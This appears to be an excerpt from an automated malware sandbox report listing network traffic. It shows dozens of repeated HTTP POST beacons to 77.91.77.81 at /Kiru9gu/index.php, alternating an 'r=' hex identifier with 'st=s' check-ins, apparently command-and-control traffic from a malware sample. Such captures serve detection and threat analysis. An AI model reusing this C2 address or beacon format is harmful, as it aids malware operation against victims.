Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 37 34 37 43 32 46 33 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F9A747C2F3FD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic	HTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
